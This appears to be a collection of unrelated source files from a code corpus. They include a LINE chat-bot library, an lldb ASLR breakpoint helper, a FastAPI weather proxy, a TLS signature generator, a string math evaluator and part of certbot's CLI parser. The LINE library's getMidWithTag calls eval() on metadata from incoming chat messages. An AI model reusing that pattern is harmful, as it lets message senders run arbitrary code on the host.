contentType: (int, optional) pass ContentType for sending 0 that meant type text
contentMetadata: (dict, optional) pass a dict data for metadata on message
Return:
<class 'AsyncLine.lib.Gen.ttypes.Message'>
"""
return await self.sendMessage(chat_id,
text,
contentType = contentType,
contentMetadata = contentMetadata,
relatedMessageServiceCode=1,
messageRelationType = 3,
relatedMessageId = relatedMessage_id
)
async def sendMusicMessage(self,
chat_id: str,
title: str = "Music Messaging",
sub_text: str = "Music Message",
url: str = None,
preview_url: str = None,
) -> Message:
m = self.auth.profile.mid
url = url if url else "line.me/ti/p/~{}".format((await self.generateUserTicket(-1)).id)
preview_url = preview_url if preview_url else 'https://obs.line-apps.com/os/p/{}'.format(m)
meta = {
'text': title,
'subText': sub_text,
'a-installUrl': url,
'i-installUrl': url,
'a-linkUri': url,
'i-linkUri': url,
'linkUri': url,
'previewUrl': preview_url,
'type': 'mt',
'a-packageName': 'com.spotify.music',
'countryCode': 'JP',
'id': 'mt000000000a6b79f9'
}
return await self.sendMessage(chat_id, None, contentType=19, contentMetadata=meta)
async def sendContact(self, chat_id: str, mid: str) -> Message:
meta = {'mid': mid}
return await self.sendMessage(chat_id, None, contentType=13, contentMetadata=meta)
async def unsendMessage(self, message_id: str) -> bool:
"""
Use this method to unsend Message containt any types
Args:
message_id: string of your message id
Return:
bool == False, because this will returning NoneType as False
"""
self._unsendMessageReq += 1
return bool(await self.call("unsendMessage", self._unsendMessageReq, message_id))
def getMidWithTag(self, message: Message) -> list:
"""
Use this method to get mid of user using Mention
Args:
message: <class 'AsyncLine.lib.Gen.ttypes.Message'>
e.g
async def _(message):
cl.talk.getMidWithTag(message)
Return:
<class 'list'> of mid user
"""
if message.contentMetadata["MENTION"] \
and message.contentMetadata is not None:
key = eval(message.contentMetadata["MENTION"])
if len(key["MENTIONEES"]) <= 1:
return key["MENTIONEES"][0]["M"]
else:
mm = []
for mid in key["MENTIONEES"]:
mm.append(mid["M"])
return mm
async def sendAudio(self,
to: str,
path: str = None,
url: str = None,
remove_path: bool = False) -> bool:
"""
Use this method to send Audio message
important if args url is given, it cannot use the path
Args:
to: mid of group or user will be send
path: string of path where audio will be send
url: string of url from audio
remove_path: set a bool parameter for deleting temp file after download contentremove_path: set a bool parameter for deleting temp file after download content
Return:
<class 'bool'> is True
"""
if path is not None and url is not None:
raise Exception("if args url is given, it cannot use the path")
if path is None and url is not None:
path = await self.cl.download_fileUrl(url)
objectId = (await self.sendMessage(to, text=None, contentType = 3)).id
return await self.cl.uploadObjTalk(path=path, types='audio', remove_path=remove_path, objId=objectId)
async def sendImage(self,
to: str,
path: str = None,
url: str = None,
remove_path: bool = False,
chunked: bool = False) -> bool:
"""
Use this method to send Image message
important if args url is given, it cannot use the path
Args:
to: mid of group or user will be send
path: string of path where image will be send
url: string of url from image
remove_path: set a bool parameter for deleting temp file after download content
Return:
<class 'bool'> is True
"""
if path is not None and url is not None:
raise Exception("if args url is given, it cannot use the path")
if url is not None and path is None:
path = await self.cl.download_fileUrl(url, chunked=chunked)
objectId = (await self.sendMessage(to, text=None, contentType=1)).id
return await self.cl.uploadObjTalk(path=path, types='image', remove_path=remove_path, objId=objectId)
async def sendVideo(self,
to: str,
path: str = None,
url: str = None,
remove_path: bool = False,
chunked: bool = False) -> bool:
"""
Use this method to send Video message
important if args url is given, it cannot use the path
Args:
to: mid of group or user will be send
path: string of path where Video will be send
url: string of url from video
remove_path: set a bool parameter for deleting temp file after download content
Return:
<class 'bool'> is True
"""
if path is not None and url is not None:
raise Exception("if args url is given, it cannot use the path")
if url is not None and path is None:
path = await self.cl.download_fileUrl(url, chunked=chunked)
objectId = (await self.sendMessage(to, text=None, contentMetadata={'VIDLEN': '60000','DURATION': '60000'}, contentType = 2)).id
return await self.cl.uploadObjTalk(path=path, types='video', remove_path=remove_path, objId=objectId)
async def sendGif(self,
to: str,
path: str = None,
url: str = None,
remove_path: bool = False) -> bool:
"""
Use this method to send Gif message
important if args url is given, it cannot use the path
Args:
to: mid of group or user will be send
path: string of path where Gif will be send
url: string of url from Gif
remove_path: set a bool parameter for deleting temp file after download content
Return:
<class 'bool'> is True
"""
if path is not None and url is not None:
raise Exception("if args url is given, it cannot use the path")
if url is not None and path is None:
path = await self.cl.download_fileUrl(url)
return await self.cl.uploadObjTalk(to=to, path=path, types='gif', remove_path=remove_path)
async def sendFile(self,
to: str,
path: str = None,
file_name: str = None,
remove_path=False):
"""
Use this method to send File message
important if args url is given, it cannot use the path
Args:
to: mid of group or user will be send
path: string of path where file will be send
url: string of url from file
remove_path: set a bool parameter for deleting temp file after download content
Return:
<class 'bool'> is True
"""
fp = open(path, 'rb')
if file_name is None:
file_name = fp.name
objectId = (await self.sendMessage(to, text=None, contentMetadata={'FILE_NAME': str(file_name),'FILE_SIZE': str(len(fp.read()))}, contentType = 14)).id
return await self.cl.uploadObjTalk(path=path, types='file', remove_path=remove_path, objId=objectId)
async def fetchOps(self, localRev, count=10):
return await self.cl.call('fetchOps', localRev, count, 0, 0)
async def fetchOperations(self, localRev, count=10):
return await self.cl.call('fetchOperations', localRev, count)
async def getReadMessageOps(self, chat_id):
return await self.call('getReadMessageOps', chat_id)
async def removeMessage(self, message_id):
return await self.call('removeMessage', message_id)
```
#### File: AsyncLine/examples/conversation.py
```python
from AsyncLine import *
import asyncio
cl = Client('ios')
cl.login(name="mybot", qr=True)
data = {
"name": None,
"old": None,
}
@cl.hooks(type=26, filters=Filters.command("start") & Filters.private)
async def start_conversation(client, msg):
await client.talk.sendMessage(msg.from_, "Hello stranger, what your name?")
"""
This method will be trigger conversation.
Note: type must be 26 (Receive Message) and use this in private chat
using Filters.private
<func>:
cl.poll.conversation(....
args func:
msg = (Message, require), Message from this comversation
callback = (callable, require), function for next conversation
done = (bool, optional), pass True if want this conversation ended
"""
client.poll.conversation(msg, callback_name)
async def callback_name(msg):
data["name"] = msg.text
await asyncio.sleep(1.3)
await cl.talk.sendMessage(msg.from_, "Okay, now how old are you?")
#done == True, after user send old this conversation will be ended
cl.poll.conversation(msg, callback_old, done=True)
async def callback_old(msg):
data["old"] = msg.text
await cl.talk.sendMessage(msg.from_,
"Nice too meet you, {} now i know your name and old {}".format(
data["name"], data["old"]))
cl.poll.streams()
``` |
{
"source": "4masaka/iREll",
"score": 2
} |
#### File: iREll/src/irell.py
```python
import lldb
import argparse
def __lldb_init_module(debugger, internal_dict):
debugger.HandleCommand("command script add -f irell.bb bb -h 'set breakpoint at address considering ASLR'")
def bb(debugger, command, result, internal_dict):
debugger = lldb.debugger
target = debugger.GetSelectedTarget()
loaded_address = target.GetModuleAtIndex(0).GetSectionAtIndex(1).GetLoadAddress(target)
aslr_slide = loaded_address - 0x100000000
parser = argparse.ArgumentParser(prog="")
parser.add_argument("address")
args = parser.parse_args(command.split())
lldb.debugger.HandleCommand (f"br set -a {int(args.address, 16)+aslr_slide}")
``` |
{
"source": "4masaka/pyne",
"score": 2
} |
#### File: pyne/tests/test_client.py
```python
import pytest
from frugal.context import FContext
from pyne.client import Client
pytestmark = pytest.mark.asyncio
@pytest.fixture
def client():
"""
Client
"""
client = Client()
return client
@pytest.mark.skip(reason="ログイン処理のため")
async def test_get_auth_qrcode(client: Client):
"""`getAuthQrcode`のテストコード
この関数で実際にAPIとの疎通が出来るか確認する
"""
res = await client.login_with_qrcode()
print(client.headers)
``` |
{
"source": "4ML-ndvr/ndvr",
"score": 2
} |
#### File: 4ML-ndvr/ndvr/app.py
```python
import os
import random
import string
import glob
import itertools as it
import click
from jina.flow import Flow
RANDOM_SEED = 14
def input_index_data(patterns, size):
def iter_file_exts(ps):
return it.chain.from_iterable(glob.iglob(p, recursive=True) for p in ps)
d = 0
if isinstance(patterns, str):
patterns = [patterns]
for g in iter_file_exts(patterns):
yield g.encode()
d += 1
if size is not None and d > size:
break
def config():
os.environ["PARALLEL"] = str(2)
os.environ["SHARDS"] = str(2)
os.environ["COLOR_CHANNEL_AXIS"] = str(0)
os.environ["JINA_PORT"] = os.environ.get("JINA_PORT", str(45678))
os.environ["WORKDIR"] = "./workspace"
os.makedirs(os.environ["WORKDIR"], exist_ok=True)
@click.command()
@click.option("--task", "-t")
@click.option("--num_docs", "-n", default=10)
def main(task, num_docs):
config()
DATA_BLOB = "./index-videos/*.mp4"
if task == "index":
f = Flow().load_config("flow-index.yml")
with f:
f.index(input_fn=input_index_data(DATA_BLOB, size=num_docs), batch_size=2)
elif task == "query":
f = Flow().load_config("flow-query.yml")
f.use_rest_gateway()
with f:
f.block()
elif task == "dryrun":
f = Flow.load_config("flow-query.yml")
with f:
pass
else:
raise NotImplementedError(
f"unknown task: {task}. A valid task is either `index` or `query` or `dryrun`."
)
if __name__ == "__main__":
main()
```
#### File: ndvr/craft/keyframe_extractor.py
```python
from Katna.video import Video
def get_keyframes_from_video(video_path, num_frames):
video = Video()
images = video.extract_frames_as_images(num_frames, video_path)
return images
``` |
{
"source": "4mr0m3r0/fast-api-weather",
"score": 3
} |
#### File: fast-api-weather/api/weather_api.py
```python
from typing import Optional
from fastapi import Depends
from pydantic import BaseModel
import fastapi
from model.validation_error import ValidationError
from services import openweather_service
router = fastapi.APIRouter()
class Location(BaseModel):
city: str
state: Optional[str] = None
country: str = 'US'
@router.get('/api/weather/{city}', name='weather')
async def index(location: Location = Depends(), units: Optional[str] = 'metrics'):
try:
return await openweather_service.get_report_async(
city=location.city,
state=location.state,
country=location.country,
units=units
)
except ValidationError as failure:
return fastapi.Response(content=failure.error_msg, status_code=failure.status_code)
```
#### File: fast-api-weather/services/openweather_service.py
```python
from typing import Optional
import httpx
from httpx import Response
from model.validation_error import ValidationError
api_key: Optional[str] = None
async def get_report_async(city: str, state: Optional[str], country: str, units: str) -> dict:
if state:
query = f'{city},{state},{country}'
else:
query = f'{city},{country}'
url = f'https://api.openweathermap.org/data/2.5/weather?q={query}&appid={api_key}&units={units}'
async with httpx.AsyncClient() as client:
resp: Response = await client.get(url)
if resp.status_code != 200:
raise ValidationError(resp.text, status_code=resp.status_code)
resp.raise_for_status()
data = resp.json()
return data
``` |
{
"source": "4Mugala/file_extension_search",
"score": 4
} |
#### File: 4Mugala/file_extension_search/main.py
```python
import datetime
import glob
class Filexts:
'''
This class scans files of a single given file extension or file type.
This class takes two arguements:
(1)root_dir: a directory string where the search stars and
(2)search_depth: the number of directories to scan from the "search_str", is optional and defaults to 1.
'''
def __init__(self, root_dir, search_depth = 1):
self.root_dir = root_dir
self.star = self.root_dir.find('*')
self.all_files = []
self.fix = '*/'
for i in range(search_depth):
self.next_dir()
def list(self):
return self.all_files
def __getitem__(self, index):
return self.all_files[index]
def next_dir(self):
self.search_dir = glob.glob(self.root_dir)
for self.file in self.search_dir:
if self.file not in self.all_files:
self.all_files.append(self.file)
else:
pass
self.root_str = (
self.root_dir[:self.star]
+ self.fix
+ self.root_dir[self.star:])
``` |
{
"source": "4mugala/InStringMath",
"score": 4
} |
#### File: 4mugala/InStringMath/main.py
```python
def is_num(value):
try:
float(value)
return True
except:
return False
def is_neg(value):
if value < 0:
return True
else:
return False
def is_math(expression, operators):
c = 0
if expression:
for i in expression:
if not c % 2:
try:
float(i)
except:
return False
else:
if i in operators:
pass
else:
return False
c += 1
return True
else:
return False
class BitupleOverflow(Exception):
pass
class Bituple:
def __init__(self, bituple):
if len(bituple) > 2:
raise BitupleOverflow(f"Bituple length too big ({len(bituple)}), must be 2")
else:
self.bituple = bituple
def first(self):
return self.bituple[0]
def last(self):
return self.bituple[1]
class Listext(list):
''' Listext (list extenssiom)'''
def __init__(self, value):
if type(value) == str:
super().__init__(value.split(" "))
else:
super().__init__(value)
self.__remove_spaces()
def __remove_spaces(self):
self.reduce([x for x in self if x], 0, len(self))
def has(self, *args):
for i in args:
if i not in self:
return False
return True
def is_homogeneous(self):
t = None
for i in self:
if t == None:
t = type(i)
elif type(i) != t and t != None:
return False
return True
def before(self, index):
return self[index - 1]
def after(self, index):
return self[index + 1]
def is_bound(self, index, *, left=False, right=False):
if not right and not left:
if self[index] == self.head() or self[index] == self.tail():
return True
elif right:
if self[index] == self.tail():
return True
elif left:
if self[index] == self.head():
return True
else:
return False
def reduce(self, value, start, stop):
if type(value) == list:
self[start:stop] = [*value]
else:
self[start:stop] = [value]
def head(self):
return self[0]
def tail(self):
return self[len(self) - 1]
def where(self, value1, value2=None, *, s=None):
if value1 in self:
if not s:
return self.index(value1)
else:
try:
return self.index(value1, s)
except:
return -1
elif value2 in self:
if not s:
return self.index(value2)
else:
return self.index(value2, s)
else:
return -1
def rwhere(self, value1, value2):
def inner(value):
c = len(self) - 1
for i in self:
if self[c] == value:
return c
c -= 1
return -1
v1 = inner(value1)
if is_neg(v1):
return inner(value2)
else:
return v1
def copy(self):
return Listext(self)
class InStringMath:
def __init__(self, expression):
self.solvable = False
self.operas = ["**", "^", "*", "×", "/", "÷",
"+", "-", "√"]
self.answer = "0.0"
self.start_pos = 0
self.expression = self.__beautify(expression)
if self.expression.tail() not in self.operas:
self.brackets(self.expression)
def __str__(self):
return self.answer
def __beautify(self, raw_expression):
def beautify_str():
beautiful_expr = ""
c = 0
for i in raw_expression:
if i == "(":
beautiful_expr += " " + i + " "
elif i == ")":
beautiful_expr += " " + i + " "
elif i == "^":
beautiful_expr += " " + i + " "
elif i == "*" and raw_expression[c-1] == "*":
beautiful_expr += i + " "
elif i == "*" and raw_expression[c+1] == "*":
beautiful_expr += " " + i
elif i == "/":
beautiful_expr += " " + i + " "
elif i == "√":
beautiful_expr += " " + i + " "
else:
beautiful_expr += i
c += 1
return beautiful_expr
def beautify_listext(expression):
expression = expression.split()
c = 0
for i in expression:
if i == "(" and c != 0:
if is_num(expression[c-1]):
expression.insert(c, "*")
elif i == ")" and c != len(expression) - 1:
if is_num(expression[c+1]):
expression.insert(c+1, "*")
elif i == ")" and expression[c+1] == "(":
vibrator.vibrate(.1)
expression.insert(c+1, "*")
c += 1
return Listext(expression)
if type(raw_expression) == str:
raw_expression = beautify_str()
raw_expression = beautify_listext(raw_expression)
else:
pass
return Listext(raw_expression)
def __brackets(self, expression):
o_brac = expression.rwhere("(", "[")
c_brac = expression.where(")", "]", s=o_brac)
if not is_neg(o_brac) and not is_neg(c_brac):
if is_math(expression[o_brac+1: c_brac],
self.operas):
ans = InStringMath(expression[o_brac+1: c_brac])
print(ans.equals(), ["BRACKETS"])
self.expression.reduce(str(ans), o_brac, c_brac+1)
o_brac = self.expression.where("(", "[")
c_brac = self.expression.where(")", "]")
if not is_neg(o_brac + c_brac):
self.__brackets(self.expression)
o_brac = self.expression.where("(", "[")
c_brac = self.expression.where(")", "]")
if is_neg(o_brac) and is_neg(c_brac):
self.no_brackets = True
else:
self.no_brackets = False
def __exponent(self, expression):
index = expression.where("**", "^")
if not is_neg(index):
if not expression.is_bound(index):
before_sign = expression.before(index)
after_sign = expression.after(index)
if is_num(before_sign) and is_num(after_sign):
ans = float(before_sign) ** float(after_sign)
print(ans, "[EXPONENTIAL]")
expression.reduce(str(ans), index-1, index+2)
if not is_neg(self.expression.where("**", "^")):
self.__exponent(self.expression)
def __multiply_and_divide(self, expression):
''' This method balances the prescedence of multilication and division. '''
index1 = expression.where("*", "×")
index2 = expression.where("/", "÷")
if index1 != -1 and index2 == -1:
index = index1
elif index2 != -1 and index1 == -1:
index = index2
elif index1 != -1 and index2 != -1:
if index1 < index2:
index = index1
else:
index = index2
else:
index = -1
if index == expression.where("*", "×"):
self.__multiply(expression, index)
elif index == expression.where("/", "÷"):
self.__divide(expression, index)
if not is_neg(index):
self.__multiply_and_divide(self.expression)
def __multiply(self, expression, index):
if not expression.is_bound(index):
before_sign = expression.before(index)
after_sign = expression.after(index)
if is_num(before_sign) and is_num(after_sign):
ans = float(before_sign) * float(after_sign)
print(ans, "[MULTIPLICATION]")
expression.reduce(str(ans), index-1, index+2)
def __divide(self, expression, index):
if not expression.is_bound(index):
before_sign = expression.before(index)
after_sign = expression.after(index)
if is_num(before_sign) and is_num(after_sign):
ans = float(before_sign) / float(after_sign)
print(ans, "[DIVISION]")
expression.reduce(str(round(ans, 6)), index-1, index+2)
def __add_and_substract(self, expression):
''' This method balances the prescedence of addition and substruction. '''
index1 = expression.where("+")
index2 = expression.where("-")
if not is_neg(index1) and is_neg(index2):
index = index1
elif not is_neg(index2) and is_neg(index1):
index = index2
elif not is_neg(index1) and not is_neg(index2):
if index1 < index2:
index = index1
else:
index = index2
else:
index = -1
if index == expression.where("+"):
self.__add(expression, index)
elif index == expression.where("-"):
self.__substract(expression, index)
if not is_neg(index):
self.__add_and_substract(self.expression)
def __add(self, expression, index):
if not expression.is_bound(index):
before_sign = expression.before(index)
after_sign = expression.after(index)
if is_num(before_sign) and is_num(after_sign):
ans = float(before_sign) + float(after_sign)
print(ans, "[ADDITION]")
expression.reduce(str(ans), index-1, index+2)
def __substract(self, expression, index):
if not expression.is_bound(index):
before_sign = expression.before(index)
after_sign = expression.after(index)
if is_num(before_sign) and is_num(after_sign):
ans = float(before_sign) - float(after_sign)
print(ans, "[SUBSTRACT]")
expression.reduce(str(ans), index-1, index+2)
def __root(self, expression, index):
if not expression.is_bound(index, right=True):
before_sign = expression.before(index)
after_sign = expression.after(index)
if is_num(before_sign) and is_num(after_sign):
ans = float(after_sign) ** (1 /float(before_sign))
print(ans, "[R]")
expression.reduce(str(ans), index-1, index+2)
elif not is_num(before_sign) and is_num(after_sign):
ans = float(after_sign) ** (1 / 2)
print(ans, "[R]")
expression.reduce(str(ans), index, index+2)
def is_root(self, value):
if value.startswith("√"):
return True
else:
return False
def equals(self):
if self.solvable:
return "{}".format(float(self.answer))
else:
return "_._"
def brackets(self, expression):
self.__brackets(expression)
if self.no_brackets and is_math(expression, self.operas):
self.exponential(expression)
def exponential(self, expression):
self.__exponent(expression)
self.multiplication_and_division(expression)
def multiplication_and_division(self, expression):
self.__multiply_and_divide(expression)
self.addition_and_substraction(expression)
def addition_and_substraction(self, expression):
self.__add_and_substract(expression)
self.answer = self.expression[0]
self.solvable = True
``` |
{
"source": "4mYHime/tls-sig-api-python",
"score": 2
} |
#### File: 4mYHime/tls-sig-api-python/TLSSigAPI.py
```python
import base64
import zlib
import json
import time
# python ecdsa 开发库请到 https://github.com/warner/python-ecdsa
# 或者 tls 技术支持分享的链接 http://share.weiyun.com/24b674bced4f84ecbbe6a7945738b9f4
# 下载,下载完毕之后进入其根目录,运行下面的命令进行安装,
# python setup.py install
# 下面是转换私钥格式命令
# openssl ec -outform PEM -inform PEM -in private.pem -out private_ec.pem
# -in 后面的传入下载的私钥 -out 后面是转换后的私钥文件
from ecdsa import SigningKey,util
import hashlib
# 这里请填写应用自己的私钥
ecdsa_pri_key = """
your_private_key
"""
def base64_encode_url(data):
base64_data = base64.b64encode(data)
# type(base64_data) ->bytes
base64_data = bytes.decode(base64_data).replace('+', '*')
base64_data = base64_data.replace('/', '-')
base64_data = base64_data.replace('=', '_')
return base64_data
def base64_decode_url(base64_data):
base64_data = base64_data.replace('*', '+')
base64_data = base64_data.replace('-', '/')
base64_data = base64_data.replace('_', '=')
raw_data = base64.b64decode(base64_data)
return raw_data
class TLSSigAPI:
""""""
__acctype = 0
__identifier = ""
__appid3rd = ""
__sdkappid = 0
__version = 20190114
__expire = 3600*24*30 # 默认一个月,需要调整请自行修改
__pri_key = ""
__pub_key = ""
_err_msg = "ok"
def __get_pri_key(self):
return self.__pri_key_loaded
def __init__(self, sdkappid, pri_key):
self.__sdkappid = sdkappid
self.__pri_key = pri_key
self.__pri_key_loaded = SigningKey.from_pem(self.__pri_key)
def __create_dict(self):
m = {}
m["TLS.account_type"] = "%d" % self.__acctype
m["TLS.identifier"] = "%s" % self.__identifier
m["TLS.appid_at_3rd"] = "%s" % self.__appid3rd
m["TLS.sdk_appid"] = "%d" % self.__sdkappid
m["TLS.expire_after"] = "%d" % self.__expire
m["TLS.version"] = "%d" % self.__version
m["TLS.time"] = "%d" % time.time()
return m
def __encode_to_fix_str(self, m):
fix_str = "TLS.appid_at_3rd:" + m["TLS.appid_at_3rd"] + "\n" \
+ "TLS.account_type:" + m["TLS.account_type"] + "\n" \
+ "TLS.identifier:" + m["TLS.identifier"] + "\n" \
+ "TLS.sdk_appid:" + m["TLS.sdk_appid"] + "\n" \
+ "TLS.time:" + m["TLS.time"] + "\n" \
+ "TLS.expire_after:" + m["TLS.expire_after"] + "\n"
return fix_str
def tls_gen_sig(self, identifier):
self.__identifier = identifier
m = self.__create_dict()
fix_str = self.__encode_to_fix_str(m)
pk_loaded = self.__get_pri_key()
sig_field = pk_loaded.sign(fix_str.encode(), hashfunc=hashlib.sha256, sigencode=util.sigencode_der)
sig_field_base64 = base64.b64encode(sig_field)
s2 = bytes.decode(sig_field_base64)
m["TLS.sig"] = s2
json_str = json.dumps(m)
# type(json_str) -> str
sig_cmpressed = zlib.compress(json_str.encode()) # json_str bytes-like -> bytes
# type(sig_cmpressed) ->bytes
base64_sig = base64_encode_url(sig_cmpressed) # sig_cmpressed bytes-like -> bytes
return base64_sig
def main():
api = TLSSigAPI(1400001052, ecdsa_pri_key)
sig = api.tls_gen_sig("xiaojun")
print sig
if __name__ == "__main__":
main()
``` |
{
"source": "4n3i5v74/certbot",
"score": 3
} |
#### File: _internal/cli/group_adder.py
```python
from certbot._internal.cli.verb_help import VERB_HELP
def _add_all_groups(helpful):
helpful.add_group("automation", description="Flags for automating execution & other tweaks")
helpful.add_group("security", description="Security parameters & server settings")
helpful.add_group("testing",
description="The following flags are meant for testing and integration purposes only.")
helpful.add_group("paths", description="Flags for changing execution paths & servers")
helpful.add_group("manage",
description="Various subcommands and flags are available for managing your certificates:",
verbs=["certificates", "delete", "renew", "revoke", "update_symlinks"])
# VERBS
for verb, docs in VERB_HELP:
name = docs.get("realname", verb)
helpful.add_group(name, description=docs["opts"])
```
#### File: _internal/cli/__init__.py
```python
import argparse
import logging
import logging.handlers
import sys
from typing import Optional
import certbot
from certbot._internal import constants
from certbot._internal.cli.cli_constants import ARGPARSE_PARAMS_TO_REMOVE
from certbot._internal.cli.cli_constants import cli_command
from certbot._internal.cli.cli_constants import COMMAND_OVERVIEW
from certbot._internal.cli.cli_constants import DEPRECATED_OPTIONS
from certbot._internal.cli.cli_constants import EXIT_ACTIONS
from certbot._internal.cli.cli_constants import HELP_AND_VERSION_USAGE
from certbot._internal.cli.cli_constants import LEAUTO
from certbot._internal.cli.cli_constants import new_path_prefix
from certbot._internal.cli.cli_constants import old_path_fragment
from certbot._internal.cli.cli_constants import SHORT_USAGE
from certbot._internal.cli.cli_constants import VAR_MODIFIERS
from certbot._internal.cli.cli_constants import ZERO_ARG_ACTIONS
from certbot._internal.cli.cli_utils import _Default
from certbot._internal.cli.cli_utils import _DeployHookAction
from certbot._internal.cli.cli_utils import _DomainsAction
from certbot._internal.cli.cli_utils import _EncodeReasonAction
from certbot._internal.cli.cli_utils import _PrefChallAction
from certbot._internal.cli.cli_utils import _RenewHookAction
from certbot._internal.cli.cli_utils import _user_agent_comment_type
from certbot._internal.cli.cli_utils import add_domains
from certbot._internal.cli.cli_utils import CaseInsensitiveList
from certbot._internal.cli.cli_utils import config_help
from certbot._internal.cli.cli_utils import CustomHelpFormatter
from certbot._internal.cli.cli_utils import flag_default
from certbot._internal.cli.cli_utils import HelpfulArgumentGroup
from certbot._internal.cli.cli_utils import nonnegative_int
from certbot._internal.cli.cli_utils import parse_preferred_challenges
from certbot._internal.cli.cli_utils import read_file
from certbot._internal.cli.group_adder import _add_all_groups
from certbot._internal.cli.helpful import HelpfulArgumentParser
from certbot._internal.cli.paths_parser import _paths_parser
from certbot._internal.cli.plugins_parsing import _plugins_parsing
from certbot._internal.cli.subparsers import _create_subparsers
from certbot._internal.cli.verb_help import VERB_HELP
from certbot._internal.cli.verb_help import VERB_HELP_MAP
from certbot._internal.plugins import disco as plugins_disco
import certbot._internal.plugins.selection as plugin_selection
import certbot.plugins.enhancements as enhancements
logger = logging.getLogger(__name__)
# Global, to save us from a lot of argument passing within the scope of this module
helpful_parser: Optional[HelpfulArgumentParser] = None
def prepare_and_parse_args(plugins, args, detect_defaults=False):
"""Returns parsed command line arguments.
:param .PluginsRegistry plugins: available plugins
:param list args: command line arguments with the program name removed
:returns: parsed command line arguments
:rtype: argparse.Namespace
"""
helpful = HelpfulArgumentParser(args, plugins, detect_defaults)
_add_all_groups(helpful)
# --help is automatically provided by argparse
helpful.add(
None, "-v", "--verbose", dest="verbose_count", action="count",
default=flag_default("verbose_count"), help="This flag can be used "
"multiple times to incrementally increase the verbosity of output, "
"e.g. -vvv.")
helpful.add(
None, "-t", "--text", dest="text_mode", action="store_true",
default=flag_default("text_mode"), help=argparse.SUPPRESS)
helpful.add(
None, "--max-log-backups", type=nonnegative_int,
default=flag_default("max_log_backups"),
help="Specifies the maximum number of backup logs that should "
"be kept by Certbot's built in log rotation. Setting this "
"flag to 0 disables log rotation entirely, causing "
"Certbot to always append to the same log file.")
helpful.add(
None, "--preconfigured-renewal", dest="preconfigured_renewal",
action="store_true", default=flag_default("preconfigured_renewal"),
help=argparse.SUPPRESS
)
helpful.add(
[None, "automation", "run", "certonly", "enhance"],
"-n", "--non-interactive", "--noninteractive",
dest="noninteractive_mode", action="store_true",
default=flag_default("noninteractive_mode"),
help="Run without ever asking for user input. This may require "
"additional command line flags; the client will try to explain "
"which ones are required if it finds one missing")
helpful.add(
[None, "register", "run", "certonly", "enhance"],
constants.FORCE_INTERACTIVE_FLAG, action="store_true",
default=flag_default("force_interactive"),
help="Force Certbot to be interactive even if it detects it's not "
"being run in a terminal. This flag cannot be used with the "
"renew subcommand.")
helpful.add(
[None, "run", "certonly", "certificates", "enhance"],
"-d", "--domains", "--domain", dest="domains",
metavar="DOMAIN", action=_DomainsAction,
default=flag_default("domains"),
help="Domain names to apply. For multiple domains you can use "
"multiple -d flags or enter a comma separated list of domains "
"as a parameter. The first domain provided will be the "
"subject CN of the certificate, and all domains will be "
"Subject Alternative Names on the certificate. "
"The first domain will also be used in "
"some software user interfaces and as the file paths for the "
"certificate and related material unless otherwise "
"specified or you already have a certificate with the same "
"name. In the case of a name collision it will append a number "
"like 0001 to the file path name. (default: Ask)")
helpful.add(
[None, "run", "certonly", "register"],
"--eab-kid", dest="eab_kid",
metavar="EAB_KID",
help="Key Identifier for External Account Binding"
)
helpful.add(
[None, "run", "certonly", "register"],
"--eab-hmac-key", dest="eab_hmac_key",
metavar="EAB_HMAC_KEY",
help="HMAC key for External Account Binding"
)
helpful.add(
[None, "run", "certonly", "manage", "delete", "certificates",
"renew", "enhance"], "--cert-name", dest="certname",
metavar="CERTNAME", default=flag_default("certname"),
help="Certificate name to apply. This name is used by Certbot for housekeeping "
"and in file paths; it doesn't affect the content of the certificate itself. "
"To see certificate names, run 'certbot certificates'. "
"When creating a new certificate, specifies the new certificate's name. "
"(default: the first provided domain or the name of an existing "
"certificate on your system for the same domains)")
helpful.add(
[None, "testing", "renew", "certonly"],
"--dry-run", action="store_true", dest="dry_run",
default=flag_default("dry_run"),
help="Perform a test run of the client, obtaining test (invalid) certificates"
" but not saving them to disk. This can currently only be used"
" with the 'certonly' and 'renew' subcommands. \nNote: Although --dry-run"
" tries to avoid making any persistent changes on a system, it "
" is not completely side-effect free: if used with webserver authenticator plugins"
" like apache and nginx, it makes and then reverts temporary config changes"
" in order to obtain test certificates, and reloads webservers to deploy and then"
" roll back those changes. It also calls --pre-hook and --post-hook commands"
" if they are defined because they may be necessary to accurately simulate"
" renewal. --deploy-hook commands are not called.")
helpful.add(
["register", "automation"], "--register-unsafely-without-email", action="store_true",
default=flag_default("register_unsafely_without_email"),
help="Specifying this flag enables registering an account with no "
"email address. This is strongly discouraged, because you will be "
"unable to receive notice about impending expiration or "
"revocation of your certificates or problems with your Certbot "
"installation that will lead to failure to renew.")
helpful.add(
["register", "update_account", "unregister", "automation"], "-m", "--email",
default=flag_default("email"),
help=config_help("email"))
helpful.add(["register", "update_account", "automation"], "--eff-email", action="store_true",
default=flag_default("eff_email"), dest="eff_email",
help="Share your e-mail address with EFF")
helpful.add(["register", "update_account", "automation"], "--no-eff-email",
action="store_false", default=flag_default("eff_email"), dest="eff_email",
help="Don't share your e-mail address with EFF")
helpful.add(
["automation", "certonly", "run"],
"--keep-until-expiring", "--keep", "--reinstall",
dest="reinstall", action="store_true", default=flag_default("reinstall"),
help="If the requested certificate matches an existing certificate, always keep the "
"existing one until it is due for renewal (for the "
"'run' subcommand this means reinstall the existing certificate). (default: Ask)")
helpful.add(
"automation", "--expand", action="store_true", default=flag_default("expand"),
help="If an existing certificate is a strict subset of the requested names, "
"always expand and replace it with the additional names. (default: Ask)")
helpful.add(
"automation", "--version", action="version",
version="%(prog)s {0}".format(certbot.__version__),
help="show program's version number and exit")
helpful.add(
["automation", "renew"],
"--force-renewal", "--renew-by-default", dest="renew_by_default",
action="store_true", default=flag_default("renew_by_default"),
help="If a certificate "
"already exists for the requested domains, renew it now, "
"regardless of whether it is near expiry. (Often "
"--keep-until-expiring is more appropriate). Also implies "
"--expand.")
helpful.add(
"automation", "--renew-with-new-domains", dest="renew_with_new_domains",
action="store_true", default=flag_default("renew_with_new_domains"),
help="If a "
"certificate already exists for the requested certificate name "
"but does not match the requested domains, renew it now, "
"regardless of whether it is near expiry.")
helpful.add(
"automation", "--reuse-key", dest="reuse_key",
action="store_true", default=flag_default("reuse_key"),
help="When renewing, use the same private key as the existing "
"certificate.")
helpful.add(
["automation", "renew", "certonly"],
"--allow-subset-of-names", action="store_true",
default=flag_default("allow_subset_of_names"),
help="When performing domain validation, do not consider it a failure "
"if authorizations can not be obtained for a strict subset of "
"the requested domains. This may be useful for allowing renewals for "
"multiple domains to succeed even if some domains no longer point "
"at this system. This option cannot be used with --csr.")
helpful.add(
